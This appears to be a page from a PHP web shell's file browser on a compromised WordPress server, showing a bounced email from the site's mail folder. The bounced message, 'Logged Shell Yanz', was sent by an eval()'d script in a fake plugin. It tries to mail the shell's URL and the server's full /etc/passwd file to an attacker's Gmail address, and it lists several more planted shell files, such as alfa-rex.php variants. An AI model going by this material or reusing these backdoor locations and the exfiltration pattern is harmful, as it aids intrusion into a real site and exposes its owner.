ï»¿
Your IP : 216.73.216.123

Current Path : /home/smartbloks/mail/new/
Current File : //home/smartbloks/mail/new/1763353993.M552544P22349.server1.smartbloks.ai,S=6158,W=6272
Envelope-to: smartbloks@server1.smartbloks.ai
Delivery-date: Mon, 17 Nov 2025 04:33:13 +0000
Auto-Submitted: auto-replied
From: Mail Delivery System <Mailer-Daemon@server1.smartbloks.ai>
To: smartbloks@server1.smartbloks.ai
References: <E1vKqbw-0005Is-2C@server1.smartbloks.ai>
Content-Type: multipart/report; report-type=delivery-status; boundary=1763353993-eximdsn-1809290989
MIME-Version: 1.0
Subject: Mail delivery failed: returning message to sender
Message-Id: <E1vKqvR-0005oo-1W@server1.smartbloks.ai>
Date: Mon, 17 Nov 2025 04:33:13 +0000

--1763353993-eximdsn-1809290989
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  loggershell443@gmail.com
    Domain smartbloks.ai has exceeded the max defers and failures per hour (5/5 (100%)) allowed. Message discarded.

--1763353993-eximdsn-1809290989
Content-type: message/delivery-status

Reporting-MTA: dns; server1.smartbloks.ai

Action: failed
Final-Recipient: rfc822;loggershell443@gmail.com
Status: 5.0.0

--1763353993-eximdsn-1809290989
Content-type: message/rfc822

Return-path: <smartbloks@server1.smartbloks.ai>
Received: from smartbloks by server1.smartbloks.ai with local (Exim 4.96.2)
	(envelope-from <smartbloks@server1.smartbloks.ai>)
	id 1vKqbw-0005Is-2C
	for loggershell443@gmail.com;
	Mon, 17 Nov 2025 04:13:04 +0000
To: loggershell443@gmail.com
Subject: Logged Shell Yanz
X-PHP-Script: smartbloks.ai/agency/wp-content/plugins/seooyanz/default.php for 114.10.78.88
X-PHP-Originating-Script: 1001:default.php(1) : eval()'d code(1) : eval()'d code(7) : eval()'d code(11) : eval()'d code
Message-Id: <E1vKqbw-0005Is-2C@server1.smartbloks.ai>
From: smartbloks@server1.smartbloks.ai
Date: Mon, 17 Nov 2025 04:13:04 +0000

[ 114.10.78.88 ]

Logged Shell http://smartbloks.ai/agency/wp-content/plugins/seooyanz/default.php Yanz Password ( |  | root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nagios:x:999:999::/var/spool/nagios:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:997:User for polkitd:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
nrpe:x:997:994:NRPE user for the NRPE service:/var/run/nrpe:/sbin/nologin
chrony:x:996:993::/var/lib/chrony:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailman:x:995:991:GNU Mailing List Manager:/usr/local/cpanel/3rdparty/mailman:/usr/local/cpanel/bin/noshell
cpanel:x:994:990::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelcabcache:x:993:989::/var/cpanel/userhomes/cpanelcabcache:/usr/local/cpanel/bin/noshell
cpanellogin:x:992:988::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:991:987::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
cpaneleximscanner:x:990:986::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:989:985::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
cpanelconnecttrack:x:988:984::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell
cpanelanalytics:x:987:983::/var/cpanel/userhomes/cpanelanalytics:/usr/local/cpanel/bin/noshell
cpses:x:986:982::/var/cpanel/cpses:/sbin/nologin
mysql:x:985:981:MySQL server:/var/lib/mysql:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:984:980:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
cpanelphppgadmin:x:983:978:phpPgAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:982:977:phpMyAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
_imunify:x:981:975::/home/_imunify:/bin/false
wp-toolkit:x:980:972::/usr/local/cpanel/3rdparty/wp-toolkit/var:/bin/false
smartbloks:x:1001:1002::/home/smartbloks:/usr/local/cpanel/bin/noshell
1) SpawnedShell 
https://smartbloks.ai/new/wp-content/plugins/wordpress-seo/vendor/about.php	https://smartbloks.ai/new/wp-content/plugins/wordpress-seo/vendor/about.php7	https://smartbloks.ai/new/wp-content/plugins/wordpress-seo/vendor/wp-login.php	https://smartbloks.ai/new/wp-content/plugins/wordpress-seo/vendor/alfa-rex.PhP7	https://smartbloks.ai/new/wp-content/plugins/wordpress-seo/vendor/alfa-rex.php56	https://smartbloks.ai/new/wp-content/plugins/wordpress-seo/vendor/alfa-rex.php8	https://smartbloks.ai/new/wp-content/plugins/wordpress-seo/vendor/index.php	https://smartbloks.ai/new/wp-content/plugins/wordpress-seo/vendor/alfa-rex.PHP	 *IP Address : [ 114.10.78.88 ]

--1763353993-eximdsn-1809290989--